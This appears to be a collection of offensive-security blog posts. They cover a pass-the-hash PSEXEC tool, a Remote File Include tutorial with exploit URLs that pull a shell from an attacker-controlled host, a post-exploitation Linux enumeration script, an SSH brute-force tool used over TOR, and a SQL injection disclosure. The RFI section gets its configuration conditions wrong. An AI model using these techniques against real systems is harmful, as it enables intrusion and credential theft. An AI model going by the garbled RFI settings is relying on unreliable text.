Yet Another SMB PSEXEC (Y.A.S.P) Tool

I was working on my own version of an updated standalone PSEXEC tool in ruby, leveraging the MSF standalone as a base along with some of the newer modules that have been released. Unfortunately SMBEXEC 2.0 was recently released which pretty much does the same thing functionality wise but has threading so its probably a bit cooler but thought I would still post mine out there for anyone who cares to take it for a spin. It is single target focused and a little different in the look and feel in comparison to some of the others available so who knows. It works for me, hope it works for someone else too....

I first started off trying to do things on my own by writing classes to wrap the smbclient tool which now supports the pass-the-hash option or can be fairly easily patched to address this. This Samba suite also includes the rpcclient tool which I originally planned to leverage to make some magic happen. Well I got the wrappers working, but was not able to get things fully working with just these two classes. I do recommend playing around with rpcclient as it is an interesting tool and can lead to a lot of insight against a remote target but that's another story. So after giving up on the rpcclient option i did some checking on the net and found some great references from Mubix and Chris Gates on the MSF standalone tool and some ways to play with it. As Chris and Rob point out the librex library is available outside of MSF as a standalone gem which gives you tons of power to do all kinds of neat things on your own. Being that the hard work was already done and available as reference in MSF i decided to borrow what i could from there and merge with my own wrappers and code to get what I wanted. The end result is an smbclient with all the psexec fun and then some.

It can do some basic recon without creds, which I am working on improving but its main focus is on re-using valid credentials. Once authenticated it's capable of running single commands using the PSEXEC technique or jumping into a pseudo shell to execute multiple commands.

Download registry hives for offline pillaging

Leverage MSFVENOM to generate shellcode and then run payloads using PowerShell (my favorite):

NOTE: You need to specify the hostname for Vista+ targets or connection will fail. You can use raw netbios requests or tool like nbtscan to find this pretty quickly and without any pain. On older targets you can omit this field for connection configuration.

The full list of available options once authenticated:

And here are a few demo videos I made to show off how you can use it....

Y.A.S.P. vs Standalone 2k3 Server:



Y.A.S.P. + PowerShell Payload vs Windows 7:
NOTE: It does leverage MSFVENOM currently to generate shellcode which gets converted over to PowerShell acceptable format and then executed via PowerShell command




Y.A.S.P. vs 2k3 Domain Controller + Active Directory Dumping 101:



You can find all the source code along with all the tools used or referenced in the above videos on my github page here: SOURCE + TOOLS

You can keep an eye on Github as I will be working on this one over time to smooth out a few things and add a few more things to it which I wasn't comfortable with rolling out just yet but again just sharing to share and inspire more coders to code cool shit. Until next time, Enjoy!

Remote File Include (RFI) Exploitation

Remote File Includes (a.k.a. RFI) work in the same way Local Fiel Includes (LFI) work with the main difference being instead of including local pages we will actually try to include remote pages from a different site and domain. The flaw is the same as LFI vulns but requires not only allow_url_fopen to be ON but also requires allow_url_include to be OFF.

LFI: allow_url_fopen = On
RFI: allow_url_include = Off

When these conditions are right we can perform a Remote File Inclusion with disastewrous affects on the target site, just as you have seen in past with LFI. We can include PHP code from remote site and use it to perform command execution on the target site and ultimately leverage it to perform a full system comprimise.

RFI technique can be used with straight inclusions:

  <?php
  $page = $_GET['page'];
  include($page);
  ?>

As well as with NULL byte inclusions where we need to kill a appended file extension or similar:

  <?php
  $page = $_GET['page'];
  include($page . ".php");
  ?>

Now in order to properly get our code injected or included we need to keep it stored on a site we contorl and we need to keep it in text format as opposed to standard PHP file format (i.e. shell.txt instead of shell.php). We replace the vuln link in our target site with a reference to a our remote controled site (http://controlled.com/shell.txt). I should note that we add a "?" to the end of our request link which will tell the target vuln server to interpret what follows as executable code. Our final exploit request link looks like this:

Straight Include:
http://target.com/vuln.php?page=http://controlled.com/shell.txt?

OR to kill appendage you might try NULL byte:
http://target.com/vuln.php?page=http://controlled.com/shell.txt?;
http://target.com/vuln.php?page=http://controlled.com/shell.txt?

Depending on which technique you use you should find (if vuln) that your remote code is now being included on the target page. The above code examples would now be returning the "$page" variable as so:

Straight Include: include('http://controlled.com/shell.txt');
OR
NULL Byte Include: include('http://controlled.com/shell.txt?/.php');

This results in our code now being included placing our remote code actively on the immediate page. If you can't execute code you wont be able to do much other than including Google which is still vuln but you need to include a full featured shell or place custom code on your remote controlled host to comprimise things and make permanent impact on the target server.

Here is a brief video I made to demonstrate how things should work for you if you come across this in one of your audits:

Hope you enjoyed the show....

Until next time, Enjoy!

The Inf0rm3r - Linux Enumeration Script

Hey Guys,

I am back and apologize for lack of activity last month, life has been crazy lately. As some of you may or may not know I been trying to step up my post exploitation skills as well as my general Linux skills. I recently jumped to Linux OS for my main day-to-day OS and have to say I've never been happier (other than Camtasia doesn't run on Linux). Anyway, I started looking into common tasks one should perform post shell access in order to increase ones chances of gaining root access and decided to try and write my first Linux script to try and help myself and since I <3 my supporters I decided to share with you guys as well. Now everyone can download and run a exploit and cross fingers and hope it works but what if it doesn't? What if we want to still try and root the box? There are many methods one can use to still gain root access without pre-compiled exploits. I will link you to a great reference guide for some basic methods one can use to go about searching for ways to gain root access and then I will give you my new script I wrote which will try to take some of the pain out of the process for you by quickly identifying some key areas one can start looking at to get things done and/or digg out a bit more info. The tool for now only does pure enumeration but I do have a few ideas for a private version which will continue development on into the future, who knows though. That being said I give you the following which I have available now:

A really good newbie guide to actual rooting methods with some understandable examples:
http://www.dankalia.com/tutor/01005/0100501004.htm

There are many other write ups out there if you search hard and do some reading. This is just a tool give-away, not a how to root the box thread. I will try to continue posting more post exploit techniques as time allows in the near future...

To the Point - Downloads:

ZIP Download: http://uppit.com/le477muzng7f/Inf0rm3r.zip

Inform3r.zip, contains the following:
Inf0rm3r.sh:

•     Actual bash script which does the enumeration magic and can be run one its own

fetch3r:

•     side project from Inf0rme3r, C based App which remotely grabs Inf0rm3r script,  runs it, and deletes it so all that is left is the report file. Also no output in terminal so can be easier on some systems (CentOS for example which have buffer size issues due to it being set at compiling time)

SCRIPT SOURCE: https://pastee.org/b4gtz

• PASS: I<3INTRA!

I also made a brief DEMO VIDEO to highlight it in action so you get an idea for what all it captures, have a look see:

NOTE: There is function already created to handle emailing of the report file if you're running the standalone script. You just need to uncomment the code in the script and then pass a email to the script when run as an argument. It requires /bin/mail from mailutils to be installed to work. I didn't get this properly installed and set-up locally so my testing only validated the logic, not the actual emailing itself, although I had a buddy state it was working for him so its up in the air for now (hence it being commented out for this release version, we will see what future brings).

Big Shout-out and special thanks to Phaedrus for helping me out with a few live test environments to fine tune a few things and th3breacher for some of the email code, suggestions and feedback!

...and of course, Greetz to and from everyone in INTRA!

If you have any questions, suggestions or feedback of any kind do let me know as I want to improve this over time to really be something unique and handy for the community to have.

Until next time, Enjoy the pursuit for r00t!

Slow Brute SSH a.k.a. slowbrute.py - A Python Based SSH Cracker, that works!

OK, so today I will provide you with a quick introduction to a really awesome SSH cracker which is based on Python, called Slow Brute SSH. It is python based but is still a Linux only script which works to perform targeted dictionary attacks against a specific SSH user instance. It has the ability to execute commands upon success and has an amazing success detection rate. I ran into problems using NCRACK myself and was looking for something better for this protocol. I tested 4-5 of the better known SSH cracking tools out there and this was the one that received my top rating, mainly due to its simplistic design and easy usability. Many of the other tools I reviewed required different version of LibSSH to be installed, particularly non-standard versions. This leads to tricky installations with tons of pre-requisites in order to get things working. This tool works well right out of the box as it should. It also presents successful findings in a super easy to read format. Here goes the quick overview…

DOWNLOAD: http://packetstormsecurity.org/files/98803/Slow-SSH-Bruteforcer.html

Download and extract the tool to your Linux desktop (tar –zxvf downloadname). That’s it! It is now installed and ready to go, just jump into the folder and enter the usual “./slowbrute.py –help” to see the list of command options:

You can see the command syntax is fairly easy to use and pick up on. You can essentially just point and shoot and the tool does all the work, easy setup. If you want to use TOR network for added anonymity just turn on TOR prior to launching and then make sure you use the “-T” or “--tor” option to route through the standard TOR port and out to target. If SSH is running on a non-standard port (22) then you can use the “–d” argument to specify the port to attack on instead of the default, if not provided the tool will assume the standard port 22 on the target. Not a lot to this one folks, simple and works well…

Here is a quick video to show you how it works in action against live target which NCRACK was unable to successfully register successful login against, hence this tutorial and tool highlight J

Video up in next 24hrs....

Until next time, Enjoy!

MangosWeb SQL Vulnerability - My First 0day!

I was doing an assessment for a friend no his new site and i discovered a SQL POST injection vector via the login form being used in the CMS he had chosen. I worked my way through the site in my usual full detailed approach and when I was done I thought to myself - why is it vulnerable? I checked the CMS he was running and then I decided to start using the power of Google to see if I could find any other sites using the same software. I soon found a working dork which produced a ton of results and low and behold the injection vector seemed to be present on almost all of them I came across. I had to play with the injection syntax to come up with a few universals, but I am happy to say that my work was published to the exploit-db and 1337day exploit database sites - made my year already!

Here are the links to the full details on the exploit:
Exploit-DB: http://www.exploit-db.com/exploits/18335/
1337day: http://www.1337day.com/exploits/17350

The point here is always keep your eyes and ears open as you never know what you might stumble across. If you find a vulnerability in one site, check to see if you found a site specific bug or if you actually found a sotfware bug which then affects multiple sites as opposed to a single site instance. The power of Google is amazing and this goes to show hard work does pay off. I am excited and just wanted to share with everyone else who might be following my blogs. Please check back soon as I have several new tuts in the works and should have new content up very shortly. Until next time, Enjoy!